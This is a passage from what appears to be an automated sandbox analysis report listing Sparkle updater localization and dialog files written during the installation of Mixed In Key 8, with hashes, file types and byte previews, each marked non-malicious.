                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".O. .%.1.$.@. .%.2.$.@. .f.o.i. .t.r.a.n.s.f.e.r.i.d.o. .e. .e.s.t... .p.r.o.n.t.o. .a. .i.n.s.t.a.l.a.r.!. .G.o.s.t.a.r.i.a. .d.e. .o. .f.a.z.e.r. .a.g.o.r.a. .e. .r.e.i.n.i.c.i.a.r. .o. .%.1.$.@. .p.o.s.t.e.r.i.o.r.m.e.n.t.e.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".O. .%.1.$.@. .n...o. .p.o.d.e. .s.e.r. .a.c.t.u.a.l.i.z.a.d.o. .q.u.a.n.d.o. .e.s.t.i.v.e.r. .a. .s.e.r. .e.x.e.c.u.t.a.d.o. .a. .p.a.r.t.i.r. .d.e. .u.m. .v.o.l.u.m.e. .a.p.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_cOYvui
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18577
                                                                                                    Entropy (8bit):6.77820719100543
                                                                                                    Encrypted:false
                                                                                                    MD5:D8066406614E41211BCC802023508908
                                                                                                    SHA1:C76BC9ABCEABE5B31FB49F19D01C7997B7A27F1D
                                                                                                    SHA-256:EDCF8265CDA33BF88DD7DA777F2BD0D0DE7EE8D1CB5F8F59509F6E84E0C3FA2F
                                                                                                    SHA-512:21E7D7CBC16B407437E2D3EDED91930514EB39B4B60FAF4BDA10A7F5E3BAC1A3F56E4DBB6D0FC650BABE35699A136FC57EA97FDBC95D6F19E6FD1A6336E637AF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_3w2D7g
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):7826
                                                                                                    Entropy (8bit):3.489210899648447
                                                                                                    Encrypted:false
                                                                                                    MD5:840CEA4BC9384DC2E0C8D0B590033D72
                                                                                                    SHA1:1FB3CFD7F3F9E76F0F2C958EFC230EDB696B6129
                                                                                                    SHA-256:25C226E5EABA90C86D05792CE50CDC6394071164B688DAF04B7B601B2DCEA1FD
                                                                                                    SHA-512:022B7A6E9EB17FA8318AEC2CCBB8370B951E83937D03607A4A84D22C1778FB89580DE14EAB3BB42E774EF587B143E2DAB6B007F8CBA29B8ABD921FCAA212123F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .a. .f.o.s.t. .d.e.s.c...r.c.a.t. ...i. .e.s.t.e. .g.a.t.a. .d.e. .u.t.i.l.i.z.a.r.e.!. .D.o.r.i...i. .s... ...l. .i.n.s.t.a.l.a...i. ...i. .s...-.l. .r.e.l.a.n.s.a...i. .%.1.$.@. .a.c.u.m.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .n.u. .p.o.a.t.e. .f.i.i. .a.c.t.u.a.l.i.z.a.t... .a.t.u.n.c.i. .c...n.d. .e.s.t.e. .p.o.r.n.i.t... .d.e. .p.e. .u.n. .v.o.l.u.m. .r.e.a.d.-.o.n.l.y. .c.a. .o. .i.m.a.g.i.n.e. .d.i.s.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_8QPu2L
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18270
                                                                                                    Entropy (8bit):6.8356926816033505
                                                                                                    Encrypted:false
                                                                                                    MD5:9587141582A18B29B0157015B963EA5F
                                                                                                    SHA1:9F0B99B24FB2A17478B531B89D6413F120AA78E1
                                                                                                    SHA-256:6B1DFC4DF69423D145634F875C260D69340EC27EF2B1FEFBF5686B66941EA13B
                                                                                                    SHA-512:75DBC826FAC24484110496889B8BA465912C8D6C2C1E9875DF3BBEBBA82DB8E08BA1100638E624409EA29275ADEF36DF24544624AE728C7F9F48653DB1A521A0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_AGr6J9
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12198
                                                                                                    Entropy (8bit):6.7150010140379885
                                                                                                    Encrypted:false
                                                                                                    MD5:1CDC030FBF7CFF8E0D94994EFA106B73
                                                                                                    SHA1:484D8BB38566D35C6BE3C5A177F39209F76A3E76
                                                                                                    SHA-256:604F44D2C72F0CB3AF6C1F4271C4132A36C83939BEDF741434BEB87B12C9AAF4
                                                                                                    SHA-512:498ACAE4D2A2909B19E686FC9DC40E1E5A5B6F348955CC0AB50DB7B7AA5B37613C48A1079CF18925DAAD9C94D99D45FA7AC1060242104C0CC85CDA02ED59DA2E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_FrZk7E
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11268
                                                                                                    Entropy (8bit):6.6972741033720675
                                                                                                    Encrypted:false
                                                                                                    MD5:BE5D7CEFFE1A006CD176CAEB17C87B88
                                                                                                    SHA1:97C42DDCCF81AF65AD4427D45FBEF2A16222629E
                                                                                                    SHA-256:E77647D9B8D49208B1A39C2F2EEEB3739EDD12B5160DF25E5D42D93AAFF1628C
                                                                                                    SHA-512:8B91C82B71655C34C4E80E8190B448003F5C5D03AF991A619D9217FD4E9BBAC9C898259FAF865B97C52E3F1BE17BFA4C5CC919BB5FEB32EBD9208DAB2A7FD4A2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............h.iX$versionX$objectsY$archiverT$top...............#.$.*...2.;.C.].e.h.l.x.y.z.{.|.}.~.........................................................................&.'.0.1.5.6.;.<.A.F.G.I.K.L.Q.n.o.p.q.z.........................................................................4.m.....M.N...O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.b.eU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....q.o.l...........p.. ...!."[NSClassName...._..SUPasswordPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9.....7.F.g.j....<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.P.T.X.Y.Z.[.YYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSvFlagsZNSEditable_..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_eNGYM1
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15662
                                                                                                    Entropy (8bit):6.792781186173288
                                                                                                    Encrypted:false
                                                                                                    MD5:74B96675ADB2428ECB1D967C2A6D7A1B
                                                                                                    SHA1:8707E222E934B14E81FE26E79FD11C018798B772
                                                                                                    SHA-256:5DB66D8561B0D81222E946823F5F7FA4525F4DD486093B08CCF72BAEAA18E219
                                                                                                    SHA-512:3D260019497C3A90C1C45EF807BB0E5D2EDAA57A5A7107CFC2F42F026B448ADE2C77ACAE5D6231224797BB50AA08914784A2CFC52848747B0745C0F46622F9BD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_1gNBcF
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):6714
                                                                                                    Entropy (8bit):4.159280820830355
                                                                                                    Encrypted:false
                                                                                                    MD5:BF65B56028121F8EB189838B247A8A8C
                                                                                                    SHA1:CE4D67DD11821DABF7F8C55E590B0F7D1F99489A
                                                                                                    SHA-256:67A6907E58F0FE4695A108A18EEC7D4CFCB80F602822653AEA51D2A705D3EC4B
                                                                                                    SHA-512:F9CD43DE3DC86EBA199A876ACA66B24F2B4471C7891F94B94D9FE41809AD31A14190AC07AE58157334D26AC5DEE2DA3B77DB7FB9EA50CD99FF8E8215CB6B0D23
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .7.0.3.@.C.6.5.=. .8. .3.>.B.>.2. .:. .8.A.?.>.;.L.7.>.2.0.=.8.N.!. .%.>.B.8.B.5. .C.A.B.0.=.>.2.8.B.L. .8. .?.5.@.5.7.0.?.C.A.B.8.B.L. .%.1.$.@.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. ."...>. .2.@.5.<.O. .@.0.1.>.B.K. .%.1.$.@. .A. .B.>.<.0.,. .?.@.5.4.=.0.7.=.0.G.5.=.=.>.3.>. .B.>.;.L.:.>. .4.;.O. .G.B.5.=.8.O.,. .:.0.:. .=.0.?.@.8.<.5.@.,. .>.1.@.0.7.0. .4.8.A.:.0. .8.;.8. .=.0.:.>.?.8.B.5.;.O. .=.0. .>.?.B.8.G.5.A.:.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_KPWRJK
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15963
                                                                                                    Entropy (8bit):6.825380721655024
                                                                                                    Encrypted:false
                                                                                                    MD5:DC54057797D75E1842B35446B183000B
                                                                                                    SHA1:CAD5EBAA06A65546474F5CF519694B384DA7ABC4
                                                                                                    SHA-256:BA1DD2CAB56E66253BD95E0482BFB80011E916AA99DE7A7FD018E0B45C477B15
                                                                                                    SHA-512:2DFCF4941C065EBCEAFCBDADAC86330163CC065F24BE01FB8174F5056933A9E134B99B92CFBE8E70DFE7AD002514609D7D786F2314087CD9ACF012495AF2F082
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$.*.+.,./.2.5.>.?.G.K.L.U.V.].^.b.w.{...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.|.....r.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_WGtX9q
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18611
                                                                                                    Entropy (8bit):6.833785673574277
                                                                                                    Encrypted:false
                                                                                                    MD5:7178E928AAC471E0659312F288A3C933
                                                                                                    SHA1:38C6C69B705B11654AF0842930364C0172DD5CFA
                                                                                                    SHA-256:BAC39D612336E64C09D03565C5DDC40C7384504F8C335FD2E18ED5F324D67BD3
                                                                                                    SHA-512:1E80407BE33AE02A733CDF9B9D5809EABBF6B838E64CD44B0FE5EFFBC5E936937CD912021E0CE7703119F28DDDFE2927B7903DBE52A0746BEE30FB7F1067B9B5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_xs4Msz
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12243
                                                                                                    Entropy (8bit):6.747548381425468
                                                                                                    Encrypted:false
                                                                                                    MD5:EB133FB33300FAE7A7A57A2AEF2570D5
                                                                                                    SHA1:C47F649F705E461E133F5017BEB49DF6141D34FE
                                                                                                    SHA-256:7D2FFFFC4600E02C79221EC86BE57EF75FACF8EF8C0990E6AC6C7395D3C99745
                                                                                                    SHA-512:587018841DC95464089218AD147DFBA25325D5C020E0E7DCF00A569264D066BD167200DC4A45A487BEB962B616A6D7AEE340998C629308170BE88E3CFCCCC6DD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_91jNN3
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):6532
                                                                                                    Entropy (8bit):3.527753638948378
                                                                                                    Encrypted:false
                                                                                                    MD5:B8EA8C26AA67B4AE84A74FA7B24B3C0A
                                                                                                    SHA1:CEDE8F0150CC6BC8C658636ADFE262DBC9AB6C1B
                                                                                                    SHA-256:428A301C3A9F7BC16E8B8FDEF9441C19D25EE834C16C53B0164D7A6D27A1B529
                                                                                                    SHA-512:B47B0DB572EDD84D42FAC7FAE393B93A7B779D72E0780510D64C492382137B5EA7F2067CE40E309A446CBEB2B8660E8817C72BB862923DB729EA0D5DB4C068B4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".A.p.l.i.k...c.i.a. .%.1.$.@. .%.2.$.@. .b.o.l.a. .p.r.e.v.z.a.t... .a. .j.e. .p.r.i.p.r.a.v.e.n... .n.a. .p.o.u.~.i.t.i.e.!. .C.h.c.e.t.e. .t.e.r.a.z. .n.a.i.n.a.t.a.l.o.v.a.e. .a. .n...s.l.e.d.n.e. .z.n.o.v.u. .s.p.u.s.t.i.e. .%.1.$.@.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".A.p.l.i.k...c.i.u. .%.1.$.@. .n.e.m.o.~.n.o. .a.k.t.u.a.l.i.z.o.v.a.e.,. .a.k. .j.e. .s.p.u.s.t.e.n... .z.o. .z.v...z.k.u. .s. .p.r...v.a.m.i. .l.e.n. .n.a. .....t.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_KRbX7w
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18527
                                                                                                    Entropy (8bit):6.789857687787387
                                                                                                    Encrypted:false
                                                                                                    MD5:C09621589C8FF8C52F30649EC9B10DE3
                                                                                                    SHA1:92164070CFDCC991A5E23AA693FF2BFDE0A3F1EC
                                                                                                    SHA-256:75FFD81FEA3A52560C46001AF2FC5E01BD2CF98414694E48EBD22BB357A8FD5C
                                                                                                    SHA-512:922F65C0EF3B56AF15C1CB721E26061BFCDB95A350221A805B434473E014BD971E76524DE47B666495D1B382F9AC1BCC16369216987523D26EF8C3CB34B0BC42
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_aKcltM
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15556
                                                                                                    Entropy (8bit):6.783251080117518
                                                                                                    Encrypted:false
                                                                                                    MD5:E29B38E0DD7C1AA2CC8EC34E572D4504
                                                                                                    SHA1:A7CA9198C9497604587755C667575B3CE298DD70
                                                                                                    SHA-256:256374A826ABE467E6311B945E205A147960A6906B588EF128201F9C4654179E
